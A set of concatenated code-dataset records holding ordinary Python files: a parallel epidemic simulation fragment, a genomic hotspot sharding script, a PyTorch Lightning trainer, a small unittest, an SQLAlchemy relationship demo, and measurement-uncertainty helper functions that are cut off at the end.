args.choice)\n print('>> TOTAL SIMS: ', args.nsims)\n print('>> END TIME: ', args.endtime)\n print('>> TOTAL SPMD PROCESSES:', 
psize)\n\nnodes=[]\n# create simulators and nodes\nsims = [] # all simulators instantiated on this machine\nfor s in range(BLOCK_LOW(rank, psize, args.nsims), BLOCK_LOW(rank+1, psize, args.nsims)):\n    sim = simulus.simulator(name='sim%d'%s)\n    sims.append(sim)\n    #print('[%d] creating simulator %s...' % (rank, sim.name))\n\n    for idx in range(BLOCK_LOW(s, args.nsims, args.total_nodes),\n                     BLOCK_LOW(s+1, args.nsims, args.total_nodes)):\n        #print('[%d] creating node %d...' % (rank, idx))\n        nodes.append(node(sim, idx, args.total_nodes,args.lookahead))\n\nif args.choice == 1:\n    # case 1: sequential simulation\n    if psize > 1:\n        raise RuntimeError(\"You are running MPI; consider CHOICE 3 or 4.\")\n    syn = simulus.sync(sims)\nelif args.choice == 2:\n    # case 2: parallel simulation on shared-memory multiprocessors\n    if psize > 1:\n        raise RuntimeError(\"You are running MPI; consider CHOICE 3 or 4.\")\n    syn = simulus.sync(sims, enable_smp=True)\nelif args.choice == 3:\n    # case 3: parallel simulation with mpi\n    syn = simulus.sync(sims, enable_spmd=True)\nelif args.choice == 4:\n    # case 4: parallel simulation with mpi and multiprocessing\n    syn = simulus.sync(sims, enable_smp=True, enable_spmd=True)\nelse:\n    raise ValueError(\"CHOICE (%d) should be 1-4\" % args.choice)\n\n# Init grid\npositions = []\nrandom.seed(args.seedR)\n# Place nodes in grids\nfor x in range(int(math.sqrt(args.total_nodes))):\n    for y in range(int(math.sqrt(args.total_nodes))):\n        px = 50 + x*60 + random.uniform(-20,20)\n        py = 50 + y*60 + random.uniform(-20,20)\n        positions.append((px,py))\n\nif rank > 0:\n    # only run() without parameters is allowed for higher ranks\n    syn.run()\nelse:\n    msgID = 1\n    for i in range(int(args.endtime/10)):\n        idx = random.randrange(len(nodes))\n        delay = args.lookahead\n        syn.send(sims[idx], 'mb%d'% idx, 'BROADCAST-hello-%d-0-0'%msgID,delay + i * 10)\n        msgID+=1\n    #time.sleep(10)\n    #syn.send(sims[idx], 'mb%d'% idx, 'BROADCAST-hello-%d-0-0'%2,10)\n\n    # run simulation and get runtime performance report\n    syn.run(args.endtime)\n    et = time.time()\n    syn.show_runtime_report(prefix='>')\n    print('>execution time python:', et - st)\n\n#timeout values\n#lookahead\n#check delays\n#solution for lazy push\n#peer sampling service\n#generate msg id\n","repo_name":"luissobral4/EpidemicSimulationModels","sub_path":"SimulationTools/pTSimulus.py","file_name":"pTSimulus.py","file_ext":"py","file_size_in_byte":11827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"70379151286","text":"# © 2019 University of Illinois Board of Trustees. 
All rights reserved\nimport ast\nimport argparse\nimport os\nimport logging\nfrom functools import reduce\nimport math\n\n\ndef measureDistance(pointA, pointB):\n \"\"\"\n Determines the distance pointB - pointA\n\n :param pointA: dict\n Point A\n\n :param pointB: dict\n Point B\n\n :return: int\n Distance\n \"\"\"\n if (pointA['chromosome'] != pointB['chromosome']):\n distance = float('inf');\n\n if ('position' in pointA) and ('position' in pointB):\n return pointB['position'] - pointA['position'];\n elif ('start' in pointB) and ('stop' in pointA):\n return pointB['start'] - pointA['stop'] + 1;\n else:\n raise ValueError(\"Bad arguments \" + str(pointA) + \", \" + str(pointB));\n\n\ndef hotspots_processor(hotspots):\n \"\"\"\n Generator for clustering adjacent hotspots\n\n :param hotspots: str\n File containing hotspots\n \"\"\"\n with open(hotspots, 'r') as fhandle:\n cluster = []\n\n for line in fhandle:\n point = ast.literal_eval(line)\n\n if len(cluster) == 0:\n cluster.append(point)\n else:\n if measureDistance(cluster[-1], point) == 1:\n cluster.append(point)\n else:\n yield cluster\n cluster = [point]\n\n if len(cluster) > 0:\n yield cluster\n\n\ndef count_hotspots(hotspots):\n \"\"\"\n Count the number of non-adjacent hotspots\n\n :param hotspots: str\n Hotspot filename\n\n :return: int\n Number of hotspots\n \"\"\"\n count = 0\n\n for _ in hotspots_processor(hotspots):\n count += 1\n\n return count\n\n\ndef cluster_hotspots(hotspots, min_separation, min_items_per_cluster):\n \"\"\"\n Cluster hotspot regions\n\n :param hotspots: str\n Hotspots filename\n\n :param min_separation: int\n Minimum separation between non-adjacent hotspots\n\n :param min_items_per_cluster: int\n Minimum number of non-adjacent hotspots\n \"\"\"\n hgen = hotspots_processor(hotspots)\n\n cluster = []\n\n for i, item in enumerate(hgen):\n if len(cluster) < min_items_per_cluster or measureDistance(cluster[-1][-1], item[0]) < min_separation:\n cluster.append(item)\n else:\n flattened_cluster = reduce(lambda a, b: a + b, cluster)\n yield flattened_cluster\n cluster = [item]\n \n if len(cluster) > 0:\n flattened_cluster = reduce(lambda a, b: a + b, cluster)\n yield flattened_cluster\n cluster = []\n\n\ndef main(args):\n dirpath, _ = os.path.split(os.path.abspath(args.outputPrefix));\n\n if os.path.exists(dirpath):\n assert(os.path.isdir(dirpath)), \"Invalid path\";\n logging.info(\"Directory %s exists\" % dirpath);\n else:\n os.makedirs(dirpath);\n logging.info(\"Creating directory %s\" % dirpath);\n\n logging.info(\"Counting hotspots\")\n num_hotspots = count_hotspots(args.hotspots)\n min_items_per_cluster = math.ceil(num_hotspots / args.maxShards)\n logging.info(\"Sharding with >= %d items per cluster\" % min_items_per_cluster)\n shard_gen = cluster_hotspots(\n args.hotspots, min_separation=args.minSeparation, min_items_per_cluster=min_items_per_cluster\n )\n counter = 0\n\n def dumpToFile(cluster_):\n if len(cluster_) == 0:\n return;\n\n with open(args.outputPrefix + \"%d.txt\" % counter, 'w') as whandle:\n for line in cluster_:\n whandle.write(str(line) + \"\\n\");\n\n for cluster in shard_gen:\n dumpToFile(cluster)\n counter += 1\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Shard a set of hotspots for parallel runs\");\n\n parser.add_argument(\n \"--hotspots\",\n help=\"File containing all hotspots of interest\",\n required=True,\n );\n\n parser.add_argument(\n \"--minSeparation\",\n help=\"Minimum separation between two hotspots for them to belong to two files\",\n 
default=25,\n );\n\n parser.add_argument(\n \"--maxShards\",\n help=\"Maximum number of shards to allow\",\n default=500,\n )\n\n parser.add_argument(\n \"--outputPrefix\",\n help=\"Prefix of output files\",\n required=True,\n );\n\n args = parser.parse_args();\n\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s');\n\n main(args)\n ","repo_name":"anands-repo/hello","sub_path":"python/shardHotspots.py","file_name":"shardHotspots.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"17147251014","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom pytorch_lightning.trainer.supporters import CombinedDataset\nfrom common.utils import flatten_dict\nfrom datasets.combo_dataloader import ComboDataloader\nfrom terrace import collate\nfrom git_timewarp import GitTimeWarp\n\nfrom datasets.make_dataset import make_dataloader, make_train_dataloader\nfrom models.make_model import make_model\nfrom validation.metrics import get_metrics, reset_metrics\nfrom .loss import get_losses\n\nclass Trainer(pl.LightningModule):\n \"\"\" General trainer for the neural networks \"\"\"\n\n @classmethod\n def from_checkpoint(cls, cfg, checkpoint_file, commit=None):\n return cls.load_from_checkpoint(checkpoint_file, cfg=cfg, commit=commit)\n\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n\n from models.make_model import make_model\n self.model = make_model(cfg)\n\n self.metrics = nn.ModuleDict()\n\n for i, name in enumerate(self.cfg.val_datasets):\n val_loader = make_dataloader(self.cfg, name, \"val\", self.model.get_input_feats())\n tasks = set(self.model.get_tasks()).intersection(val_loader.dataset.get_tasks())\n\n # give the model an initial batch before training to initialize\n # its (lazily created) parameters\n x, y = collate([val_loader.dataset[0]])\n self.model.predict_train(x, y, tasks, \"val\", 0)\n \n def get_tasks(self, prefix, dataset_idx):\n dataset = self.get_dataset(prefix, dataset_idx)\n return set(self.model.get_tasks()).intersection(dataset.get_tasks())\n\n @property\n def device(self):\n return next(iter(self.parameters())).device\n\n def make_metrics(self, name, tasks, dataset_idx):\n if dataset_idx is None:\n key = f\"{name}_metrics\"\n else:\n key = f\"{name}_metrics_{dataset_idx}\"\n if key not in self.metrics:\n self.metrics[key] = get_metrics(self.cfg, tasks).to(self.device)\n return self.metrics[key]\n\n def get_metrics(self, name):\n ret = nn.ModuleDict()\n for key in self.metrics:\n if f\"{name}_metrics\" in key:\n ret.update(self.metrics[key])\n return ret\n \n def get_dataloader(self, prefix):\n if prefix == 'train':\n return self.trainer.train_dataloader.loaders\n elif prefix == 'val':\n return self.trainer.val_dataloaders\n\n def get_dataset(self, prefix, dataset_idx):\n loader = self.get_dataloader(prefix)\n if isinstance(loader, list):\n if dataset_idx is None:\n dataset_idx = 0\n loader = loader[dataset_idx]\n\n if isinstance(loader, ComboDataloader) and dataset_idx is not None:\n return loader.loaders[dataset_idx].dataset\n\n if isinstance(loader.dataset, CombinedDataset):\n dataset = loader.dataset.datasets\n else:\n dataset = loader.dataset\n\n return dataset\n\n def shared_eval(self, prefix, batch, batch_idx, dataset_idx=None):\n\n x, y = batch\n tasks = self.get_tasks(prefix, dataset_idx)\n metrics = self.make_metrics(prefix, tasks, dataset_idx)\n\n pred = self.model.predict_train(x, y, tasks, prefix, 
batch_idx)\n loss, loss_dict = get_losses(self.cfg, tasks, x, pred, y)\n\n if dataset_idx is not None:\n self.log(f\"{prefix}/loss\", loss, prog_bar=True, batch_size=len(x))\n for key, val in loss_dict.items():\n self.log(f\"{prefix}/{key}\", val, prog_bar=True, batch_size=len(x))\n \n on_step = prefix == \"train\"\n on_epoch = not on_step\n computed_metrics = {}\n for key, val in metrics.items():\n val.update(x, pred, y)\n if prefix == 'train' and batch_idx % self.cfg.metric_reset_interval == 0:\n computed_metrics[key] = val.compute()\n val.apply(reset_metrics)\n\n dataset = self.get_dataset(prefix, dataset_idx)\n\n dataset_name = dataset.get_name()\n for key, val in flatten_dict(computed_metrics).items():\n self.log(f\"{prefix}/{dataset_name}/{key}\", val, prog_bar=False, on_step=on_step, on_epoch=on_epoch, batch_size=len(x), add_dataloader_idx=False)\n\n if \"profile_max_batches\" in self.cfg and batch_idx >= self.cfg.profile_max_batches:\n raise RuntimeError(\"Stop the process!\")\n\n return loss\n\n def training_step(self, batch, batch_idx):\n loader = self.get_dataloader(\"train\")\n if isinstance(loader, ComboDataloader):\n dataset_idx = loader.get_dataset_index(batch_idx)\n return self.shared_eval(\"train\", batch, batch_idx, dataset_idx)\n return self.shared_eval('train', batch, batch_idx)\n \n def validation_step(self, batch, batch_idx, dataset_idx=None):\n return self.shared_eval('val', batch, batch_idx, dataset_idx)\n\n def test_step(self, batch, batch_idx, dataset_idx=None):\n return self.shared_eval('test', batch, batch_idx, dataset_idx)\n \n def shared_epoch_end(self, prefix):\n # todo cant handle multiple dataloaders\n if prefix != \"train\": # smh train epoch end sometimes logs before computing metrics\n self.log_all_metrics(prefix, None)\n self.get_metrics(prefix).apply(reset_metrics)\n\n def on_validation_epoch_end(self):\n self.shared_epoch_end(\"val\")\n\n def on_train_epoch_end(self):\n self.shared_epoch_end(\"train\")\n\n def on_test_epoch_end(self):\n self.shared_epoch_end(\"test\")\n\n def log_all_metrics(self, prefix, dataset_idx):\n dataset_name = self.get_dataset(prefix, dataset_idx).get_name()\n tasks = self.get_tasks(prefix, dataset_idx)\n metrics = self.make_metrics(prefix, tasks, dataset_idx)\n computed_metrics = {}\n for key, val in metrics.items():\n computed_metrics[key] = val.compute()\n for key, val in flatten_dict(computed_metrics).items():\n self.log(f\"{prefix}/{dataset_name}/{key}\", val, prog_bar=False, on_epoch=True, batch_size=1, add_dataloader_idx=False)\n\n def configure_optimizers(self):\n return torch.optim.AdamW(self.parameters(), lr=self.cfg.learn_rate)\n\n def fit(self, logger, callbacks):\n\n train_loader = make_train_dataloader(self.cfg, self.model.get_input_feats())\n # train_loader = make_dataloader(self.cfg, self.cfg.train_dataset, \"train\", self.model.get_input_feats())\n val_loaders = []\n for name in self.cfg.val_datasets:\n val_loader = make_dataloader(self.cfg, name, \"val\", self.model.get_input_feats())\n val_loaders.append(val_loader)\n\n gpus = int(torch.cuda.is_available())\n\n # from pytorch_lightning.profiler import PyTorchProfiler\n # profiler = PyTorchProfiler()\n\n self.trainer = pl.Trainer(gpus=gpus,\n num_sanity_val_steps=0,\n max_epochs=self.cfg.max_epochs,\n val_check_interval=self.cfg.val_check_interval,\n check_val_every_n_epoch=self.cfg.get(\"check_val_every_n_epoch\", 1),\n log_every_n_steps=self.cfg.metric_reset_interval,\n logger=logger,\n callbacks=callbacks,\n #profiler=profiler,\n 
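The Trainer above pushes one collated sample through predict_train before fitting because, per its own comment, the model's parameters are created lazily and do not exist until input shapes are known. A small standalone sketch of the same pattern with torch's built-in lazy layers (illustrative only, not the project's model):

    import torch
    import torch.nn as nn

    model = nn.Sequential(nn.LazyLinear(8), nn.ReLU(), nn.LazyLinear(1))
    _ = model(torch.randn(2, 16))  # one dummy batch materializes the weights
    print(sum(p.numel() for p in model.parameters()))  # 16*8+8 + 8*1+1 = 145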
resume_from_checkpoint=None)\n\n self.trainer.fit(self, train_loader, val_loaders)\n","repo_name":"molecularmodelinglab/plantain","sub_path":"training/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"76"} +{"seq_id":"8565155571","text":"import unittest\r\nfrom automation import Automation\r\n\r\nautomation = Automation()\r\nclass Automation(unittest.TestCase):\r\n\r\n\r\n def test_buscar(self):\r\n titulo = \"dodge 2000 stratus balatas\"\r\n texto_resultado = automation.buscar(titulo)\r\n self.assertEqual(texto_resultado, \"Hay 13 productos.\")\r\n automation.cerrar()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()","repo_name":"lucin21/ba-buscador","sub_path":"test_automation.py","file_name":"test_automation.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6051708336","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import relation, relationship\n\nfrom TestPython.test_sqlalchemy.sqlalchemy_relationships import Base, engine, session\n\n\nclass User(Base):\n __tablename__ = 'users'\n id = Column('id', Integer, primary_key=True)\n name = Column('name', String(length=255))\n address = relationship('Address', uselist=False)\n\n\nclass Address(Base):\n __tablename__ = 'addresses'\n id = Column('id', Integer, primary_key=True)\n email = Column('email', String(length=255))\n user_id = Column(Integer, ForeignKey('users.id'))\n user = relationship('User', uselist=False)\n\n\nfor tbl in reversed(Base.metadata.sorted_tables):\n engine.execute(tbl.delete())\n\nBase.metadata.create_all(bind=engine)\n\n\nwendy = User(name='wendy')\nmary = User(name='mary')\nsession.add(wendy)\nsession.add(mary)\nsession.commit()\n\naddress1 = Address(email=\"a1\", user_id=wendy.id)\naddress2 = Address(email=\"a2\", user_id=wendy.id)\naddress3 = Address(email=\"a3\", user_id=wendy.id)\nsession.add(address1)\nsession.add(address2)\nsession.add(address3)\nsession.commit()\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_sqlalchemy/sqlalchemy_relationships/one_to_one.py","file_name":"one_to_one.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71371542967","text":"from decimal import *\r\n\r\n\"\"\"\r\nAll the data are in type of Decimal, all data are analysed in 2-d matrix of numpy\r\n\"\"\"\r\n\r\nrowindex = [0.683, 0.9, 0.955, 0.997]\r\ncolumnindex = [3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 21]\r\n\r\ndata = [\r\n ['1.32', '1.2', '1.14', '1.11', '1.09', '1.08', '1.07', '1.06', '1.04',\r\n '1.03', '1'],\r\n ['2.92', '2.35', '2.13', '2.02', '1.94', '1.89', '1.86', '1.83', '1.76',\r\n '1.73', '1.65'],\r\n ['4.3', '3.18', '2.78', '2.56', '2.45', '2.37', '2.31', '2.26', '2.15',\r\n '2.09', '1.96'],\r\n ['9.93', '5.84', '4.6', '4.03', '3.71', '3.5', '3.36', '3.25', '2.98',\r\n '2.86', '2.58']]\r\n\r\n\r\ndef toDecimal(num):\r\n \"\"\"\r\n :param num: a number from the test data which is of type float, int or string\r\n :return: the corresponding number in type of Decimal\r\n \"\"\"\r\n if isinstance(num, str):\r\n return Decimal(num)\r\n else:\r\n num = str(num)\r\n return Decimal(num)\r\n\r\n\r\ndef rounddigits(inttype):\r\n \"\"\"\r\n Given a int number, pop a Decimal with the digits of inttype. eg. 
input:3, output: Decimal('0.001')\r\n    This should only be used in the .quantize() method of the Decimal class.\r\n    :param inttype: a number in type of int\r\n    :return: a Decimal with the digits of inttype\r\n    \"\"\"\r\n    return Decimal(10) ** ((-1) * inttype)\r\n\r\n\r\ndef eff(num):\r\n    \"\"\"\r\n    Takes a number num in Decimal and returns its number of effective digits\r\n    :param num: a number in type of Decimal\r\n    :return: the number of effective digits\r\n    \"\"\"\r\n    num = num.to_eng_string()\r\n    assert isinstance(num, str)\r\n    digits = 0\r\n    is_leading_zero = True\r\n    for i in range(len(num)):\r\n        if num[i] == 'E' or num[i] == 'e':\r\n            break\r\n        digit = ord(num[i]) - ord('0')\r\n        if 0 <= digit <= 9:\r\n            if digit > 0 or (digit == 0 and not is_leading_zero):\r\n                digits += 1 # increment for every effective digit encountered\r\n                is_leading_zero = False # after the first effective digit, zeros are no longer leading zeros; they are all effective digits\r\n    return max(digits, 1)\r\n\r\n\r\ndef digits(num, truedigit=False):\r\n    \"\"\"\r\n    :param num: (Decimal) a number in type of Decimal\r\n    :return: (int) the effective digits after the decimal dot\r\n    \"\"\"\r\n    if not isinstance(num, Decimal):\r\n        raise TypeError(r'Decimal type is needed, not ' + str(type(num)) + '.')\r\n\r\n    numstr = num.to_eng_string()\r\n    try:\r\n        temp = numstr.split('.')[1]\r\n    except: # if num is an integer\r\n        return len(numstr.split('.')[0])\r\n\r\n    if truedigit:\r\n        # if number is a pure decimal\r\n        if numstr.split('.')[0] == '0':\r\n            return eff(num)\r\n        else:\r\n            return len(temp)\r\n    else:\r\n        return len(temp)\r\n\r\n\r\ndef checkeff(datamat):\r\n    # Need to be tested#\r\n    \"\"\"\r\n    This function is used to check if there are any data that lose their last digit '0' throughout the numpy data matrix\r\n    :param datamat: the checked numpy datamatrix with elements in type of Decimal. The data must not have any indices!\r\n    :return: the corrected datamatrix\r\n    \"\"\"\r\n    counter = {}\r\n    length = len(datamat)\r\n    for i in range(0, length):\r\n        num = datamat[i]\r\n        try:\r\n            counter[str(digits(num))] += 1\r\n        except KeyError:\r\n            counter[str(digits(num))] = 1\r\n    if len(counter) == 1:\r\n        print(\"No data need to be fixed.\")\r\n        return datamat\r\n    else:\r\n        tempkeyarray = []\r\n        tempvaluearray = []\r\n        for k in counter.keys():\r\n            tempkeyarray.append(k)\r\n            tempvaluearray.append(counter[k])\r\n        maxdigit = tempkeyarray[tempvaluearray.index(max(tempvaluearray))]\r\n        maxdigit = int(maxdigit)\r\n        for i in range(0, length):\r\n            datamat[i] = datamat[i].quantize(Decimal(10) ** ((-1) * maxdigit))\r\n\r\n        print(\"Data has been fixed\")\r\n        return datamat\r\n\r\n\r\ndef findMean(array, auto=True, roundornot=True):\r\n    \"\"\"\r\n    :param array: (Decimal array) an array whose elements are in type of Decimal\r\n    :param auto: (boolean) switch if the return value saves one digit more automatically, default as true\r\n    :param roundornot: (boolean) choose if the result is to be rounded\r\n    :return: (Decimal) the mean of this array in Decimal\r\n    \"\"\"\r\n    digeff = digits(array[0]) # the effective digits after the decimal dot\r\n    if auto:\r\n        digeff += 1\r\n\r\n    n = Decimal(len(array)) # the length of array in type of Decimal\r\n    arraysum = sum(array)\r\n\r\n    mean = arraysum / n\r\n    if roundornot:\r\n        meanString = mean.to_eng_string()\r\n        meanStringDecimalPart = meanString.split('.')[1]\r\n        if len(meanStringDecimalPart) == (digeff - 1):\r\n            digeff -= 1\r\n        return mean.quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n    else:\r\n        return mean\r\n\r\n\r\ndef findSigmaSquare(array, auto=True, perceMod=False, roundornot=True):\r\n    \"\"\"\r\n    Return the variance of the input array (data).\r\n    
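Everything in this functions.py record reduces to Decimal.quantize with an exponent template such as rounddigits(n) == Decimal('0.001'). A quick standalone demonstration of how quantize and ROUND_HALF_EVEN (banker's rounding, used throughout the record) behave:

    from decimal import Decimal, ROUND_HALF_EVEN

    step = Decimal(10) ** -2  # Decimal('0.01'), i.e. rounddigits(2)
    print(Decimal("2.675").quantize(step, ROUND_HALF_EVEN))  # 2.68
    print(Decimal("2.665").quantize(step, ROUND_HALF_EVEN))  # 2.66 (ties go to the even digit)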
:param array: (Decimal array) the data whose variance is wanted.\r\n    :param auto: (boolean) switch if the return value saves one digit more automatically, default as true.\r\n    :param perceMod: (boolean) switch if calculate from the original array or by function .findMean(auto = True)\r\n    :param roundornot: (boolean) choose if the result is to be rounded\r\n    :return: (Decimal) the sample variance.\r\n    \"\"\"\r\n    digeff = digits(array[0]) # the effective digits after the decimal dot\r\n    if auto:\r\n        digeff += 1\r\n\r\n    n = Decimal(len(array))\r\n    if not perceMod:\r\n        mean = findMean(array, auto=True, roundornot=True)\r\n    else:\r\n        mean = findMean(array, auto=True, roundornot=False)\r\n\r\n    errorSquareSum = sum([(x - mean) ** 2 for x in array])\r\n    sigmaSquare = errorSquareSum / (n - 1)\r\n\r\n    if roundornot:\r\n        return sigmaSquare.quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n    else:\r\n        return sigmaSquare\r\n\r\n\r\ndef findSigma(array, auto=True, perceMod=True, roundornot=True):\r\n    \"\"\"\r\n    :param array: (Decimal array) the data whose standard deviation is wanted.\r\n    :param auto: (boolean) switch if the return value saves one digit more automatically, default as true.\r\n    :param perceMod: (boolean) switch if calculate from the original array or by function .findMean(auto = True)\r\n    :return: (Decimal) the standard deviation of the input data\r\n    \"\"\"\r\n\r\n    if not perceMod:\r\n        SigmaSquare = findSigmaSquare(array, auto=True, perceMod=False, roundornot=True)\r\n    else:\r\n        SigmaSquare = findSigmaSquare(array, auto=True, perceMod=True, roundornot=False)\r\n\r\n    sigma = SigmaSquare.sqrt()\r\n    zeroflag = False\r\n    decimalflag = False\r\n\r\n    sigmaString = sigma.to_eng_string()\r\n    intPart = sigmaString.split('.')[0]\r\n    if not len(intPart) == len(sigmaString):\r\n        decimalflag = True\r\n        decimalPart = sigmaString.split('.')[1]\r\n        digiteff = 0\r\n        if intPart == '0':\r\n            while decimalPart[digiteff] == '0':\r\n                digiteff += 1\r\n            digiteff += 2\r\n        else:\r\n            digiteff = -len(intPart) + 2\r\n    elif sigmaString == '0':\r\n        zeroflag = True\r\n    else:\r\n        digiteff = 0\r\n        digiteff = -len(intPart) + 2\r\n\r\n    if roundornot:\r\n        if zeroflag:\r\n            return sigma.sqrt()\r\n        elif decimalflag:\r\n            if decimalPart[digiteff - 1] == '0':\r\n                digiteff += 1\r\n            return (SigmaSquare.sqrt()).quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n        else:\r\n            return (SigmaSquare.sqrt()).quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n    else:\r\n        return SigmaSquare.sqrt()\r\n\r\n\r\ndef findAverageStanderdDifference(array, auto=True, perceMod=False, roundornot=True):\r\n    \"\"\"\r\n\r\n    :param array: (Decimal array)\r\n    :param auto: (boolean)\r\n    :param perceMod: (boolean)\r\n    :param roundornot: (boolean)\r\n    :return: (Decimal)\r\n    \"\"\"\r\n    digeff = digits(array[0]) # the effective digits after the decimal dot\r\n    if auto:\r\n        digeff += 1\r\n\r\n    if not perceMod:\r\n        sigma = findSigma(array, auto=True, perceMod=False, roundornot=True)\r\n    else:\r\n        sigma = findSigma(array, auto=True, perceMod=True, roundornot=False)\r\n\r\n    n = Decimal(len(array))\r\n    if roundornot:\r\n        return (sigma / (n.sqrt())).quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n    else:\r\n        return sigma / (n.sqrt())\r\n\r\n\r\ndef findPIndexOfFactor(number):\r\n    try:\r\n        return rowindex.index(number)\r\n    except BaseException:\r\n        print('Cannot Find Corresponding Index of Input P.')\r\n\r\n\r\ndef findnIndexOfFactor(number):\r\n    try:\r\n        return columnindex.index(number)\r\n    except BaseException:\r\n        print('Cannot Find Corresponding Index of 
Input n.')\r\n\r\n\r\ndef findCorrectionFactor(n, P):\r\n    \"\"\"\r\n\r\n    :param n: (int) the number of attempts of experiments\r\n    :param P: (float) the wanted probability\r\n    :return: (Decimal) the correction factor\r\n    \"\"\"\r\n    return Decimal(data[findPIndexOfFactor(P)][findnIndexOfFactor(n)])\r\n\r\n\r\ndef checkLayouts(array, range=3):\r\n    \"\"\"\r\n    :param array: (Decimal array) input data.\r\n    :param range: (int > 0) the cutoff range (x*sigma, default x = 3) for outliers.\r\n    :return: (Decimal array) the array without outliers. If there are any outliers, a notification\r\n            will show up.\r\n    \"\"\"\r\n    mean = findMean(array)\r\n    sigma = findSigma(array)\r\n    minus3sigma = mean - range * sigma\r\n    plus3sigma = mean + range * sigma\r\n    newarray = []\r\n\r\n    flag = 0\r\n    for x in array:\r\n        if x <= plus3sigma and x >= minus3sigma:\r\n            newarray.append(x)\r\n        else:\r\n            if flag == 1:\r\n                print('Outlier:' + str(x))\r\n            else:\r\n                flag = 1\r\n                print('There are outliers in this data.')\r\n                print('Outlier:' + str(x))\r\n    return newarray\r\n\r\n\r\ndef findUa(array, n, P, perceMod=False, roundornot=True):\r\n    CorrectionFactor = findCorrectionFactor(n=n, P=P)\r\n    if perceMod:\r\n        sigma = findSigma(array, perceMod=True, roundornot=False)\r\n    else:\r\n        sigma = findSigma(array)\r\n    n = Decimal(len(array))\r\n    Ua = CorrectionFactor * sigma / n.sqrt()\r\n\r\n    zeroflag = False\r\n    decimalflag = False\r\n\r\n    UaString = Ua.to_eng_string()\r\n    intPart = UaString.split('.')[0]\r\n    if not len(intPart) == len(UaString): # the number is not an int\r\n        decimalflag = True\r\n        decimalPart = UaString.split('.')[1] # Ua cannot be zero\r\n        digiteff = 0\r\n        if intPart == '0':\r\n            try:\r\n                while decimalPart[digiteff] == '0': # find the second effective digit\r\n                    digiteff += 1\r\n                digiteff += 2\r\n            except IndexError: # the decimal part is also equal to 0 (Ua is 0.000)\r\n                digiteff = 1\r\n        else:\r\n            digiteff = -len(intPart) + 2\r\n    elif UaString == '0':\r\n        zeroflag = True\r\n    else:\r\n        digiteff = 0\r\n        digiteff = -len(intPart) + 2\r\n\r\n    if roundornot:\r\n        if zeroflag:\r\n            return Ua\r\n        elif decimalflag:\r\n            return Ua.quantize(rounddigits(digiteff))\r\n        else:\r\n            return Ua.quantize(rounddigits(digiteff))\r\n    else:\r\n        return Ua\r\n\r\n\r\ndef findU(Ua, Ub, roundornot=True):\r\n    \"\"\"\r\n    :param Ua: (Decimal)\r\n    :param Ub: (Decimal)\r\n    :return: (Decimal)\r\n    \"\"\"\r\n    if (not isinstance(Ua, Decimal)) or (not isinstance(Ub, Decimal)):\r\n        raise TypeError(\"Decimal is needed here, not \" + str(type(Ua)) + \" and \" + str(type(Ub)))\r\n\r\n    U = (Ua ** 2 + Ub ** 2).sqrt()\r\n\r\n    if roundornot:\r\n        UString = U.to_eng_string()\r\n        intPart = UString.split('.')[0]\r\n        decimalPart = UString.split('.')[1] # U cannot be zero\r\n        digiteff = 0\r\n        if intPart == '0':\r\n            while decimalPart[digiteff] == '0':\r\n                digiteff += 1\r\n            digiteff += 2\r\n        else:\r\n            digiteff = -len(intPart)\r\n        return U.quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n    else:\r\n        return U\r\n\r\n\r\ndef roundU(u):\r\n    \"\"\"\r\n    Given an uncertainty U, round it up to one effective digit\r\n    :param u: Decimal\r\n    :return: Decimal\r\n    \"\"\"\r\n    string = u.to_eng_string()\r\n    intpart = string.split('.')[0]\r\n    try:\r\n        decimalpart = string.split('.')[1]\r\n        digiteff = 0\r\n        if intpart == '0':\r\n            while decimalpart[digiteff] == '0':\r\n                digiteff += 1\r\n            digiteff += 1\r\n        else:\r\n            digiteff = -len(intpart) + 1\r\n    except IndexError:\r\n        digiteff = -len(intpart) + 1 # may not be true\r\n    return u.quantize(rounddigits(digiteff), ROUND_UP)\r\n\r\n\r\ndef roundMean(mean, roundedU):\r\n    \"\"\"\r\n    
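roundU above keeps one effective digit of the uncertainty and always rounds up, the usual convention for measurement uncertainties. The same effect can be sketched directly with Decimal.adjusted(), which gives the exponent of the leading digit (standalone illustration, not using the helpers in this record):

    from decimal import Decimal, ROUND_UP

    u = Decimal("0.0347")
    step = Decimal(10) ** u.adjusted()  # 0.01: position of the leading digit
    print(u.quantize(step, ROUND_UP))   # 0.04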
